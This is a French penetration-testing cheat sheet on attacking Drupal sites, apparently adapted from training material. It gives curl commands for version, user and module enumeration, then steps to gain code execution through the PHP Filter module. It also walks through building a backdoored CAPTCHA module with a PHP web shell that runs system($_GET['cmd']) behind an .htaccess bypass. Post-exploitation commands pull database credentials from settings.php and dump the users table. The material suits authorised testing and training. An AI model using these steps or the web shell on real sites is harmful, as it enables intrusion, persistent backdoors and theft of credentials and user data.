Discovery

• Vérifiez meta

curl https://www.drupal.org/ | grep 'content="Drupal'

• Node: Drupal indexe son contenu en utilisant des nœuds. Un nœud peut contenir n'importe quoi comme un article de blog, un sondage, un article, etc. Les URI des pages sont généralement de la forme /node/<nodeid>.

curl drupal-site.com/node/1

Énumération

Drupal prend en charge trois types d'utilisateurs par défaut :

1. Administrateur : Cet utilisateur a un contrôle total sur le site Web Drupal.

2. Utilisateur Authentifié : Ces utilisateurs peuvent se connecter au site Web et effectuer des opérations telles que l'ajout et la modification d'articles en fonction de leurs autorisations.

3. Anonyme : Tous les visiteurs du site Web sont désignés comme anonymes. Par défaut, ces utilisateurs ne sont autorisés qu'à lire les publications.

Version

• Vérifiez /CHANGELOG.txt

curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""

Drupal 7.57, 2018-02-21

Énumération des noms d'utilisateur

Enregistrement

Dans /user/register, essayez simplement de créer un nom d'utilisateur et s'il est déjà pris, une notification s'affichera :

Demande de nouveau mot de passe

Si vous demandez un nouveau mot de passe pour un nom d'utilisateur existant :

Si vous demandez un nouveau mot de passe pour un nom d'utilisateur inexistant :

Obtenir le nombre d'utilisateurs

En accédant à /user/<number>, vous pouvez voir le nombre d'utilisateurs existants, dans ce cas, il y en a 2 car /users/3 renvoie une erreur de non trouvé :

Pages cachées

Faites un fuzz sur /node/$ où $ est un nombre (de 1 à 500 par exemple). Vous pourriez trouver des pages cachées (test, dev) qui ne sont pas référencées par les moteurs de recherche.

Informations sur les modules installés

#From https://twitter.com/intigriti/status/1439192489093644292/photo/1
#Get info on installed modules
curl https://example.com/config/sync/core.extension.yml
curl https://example.com/core/core.services.yml

# Download content from files exposed in the previous step
curl https://example.com/config/sync/swiftmailer.transport.yml

Automatique

droopescan scan drupal -u http://drupal-site.local

RCE

Avec le Module de Filtre PHP

Vous avez besoin que le plugin php soit installé (vérifiez en accédant à /modules/php et s'il renvoie un 403, alors il existe, s'il n'est pas trouvé, alors le plugin php n'est pas installé)

Allez dans Modules -> (Cochez) PHP Filter -> Enregistrer la configuration

Ensuite, cliquez sur Ajouter du contenu -> Sélectionnez Page de base ou Article -> Écrivez le code shell php dans le corps -> Sélectionnez Code PHP dans Format de texte -> Sélectionnez Aperçu

Enfin, accédez simplement au nœud nouvellement créé:

curl http://drupal-site.local/node/3

Installer le module PHP Filter

À partir de la version 8 et ultérieures, le module PHP Filter n'est pas installé par défaut. Pour utiliser cette fonctionnalité, nous devrons installer le module nous-mêmes.

1. Téléchargez la version la plus récente du module depuis le site Web de Drupal.

2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

3. Une fois téléchargé, allez dans Administration > Rapports > Mises à jour disponibles.

4. Cliquez sur Parcourir, sélectionnez le fichier dans le répertoire où vous l'avez téléchargé, puis cliquez sur Installer.

5. Une fois le module installé, vous pouvez cliquer sur Contenu et créer une nouvelle page de base, de la même manière que dans l'exemple de Drupal 7. Assurez-vous à nouveau de sélectionner Code PHP dans le menu déroulant Format de texte.

Module avec une porte dérobée

Un module avec une porte dérobée peut être créé en ajoutant un shell à un module existant. Les modules peuvent être trouvés sur le site drupal.org. Choisissons un module tel que CAPTCHA. Faites défiler vers le bas et copiez le lien vers l'archive tar.gz archive.

• Téléchargez l'archive et extrayez son contenu.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

• Créez un shell web PHP avec le contenu :

<?php
system($_GET["cmd"]);
?>

• Ensuite, nous devons créer un fichier .htaccess pour nous donner accès au dossier. C'est nécessaire car Drupal refuse l'accès direct au dossier /modules.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• La configuration ci-dessus appliquera des règles pour le dossier / lorsque nous demandons un fichier dans /modules. Copiez ces deux fichiers dans le dossier captcha et créez une archive.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

• En supposant que nous avons un accès administratif au site Web, cliquez sur Gérer puis sur Étendre dans la barre latérale. Ensuite, cliquez sur le bouton + Installer un nouveau module, et nous serons redirigés vers la page d'installation, telle que http://drupal-site.local/admin/modules/install. Parcourez l'archive Captcha piégée et cliquez sur Installer.

• Une fois l'installation réussie, accédez à /modules/captcha/shell.php pour exécuter des commandes.

Post Exploitation

Lire settings.php

find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null

Extraire les utilisateurs de la base de données

mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users'

Références

• https://academy.hackthebox.com/module/113/section/1209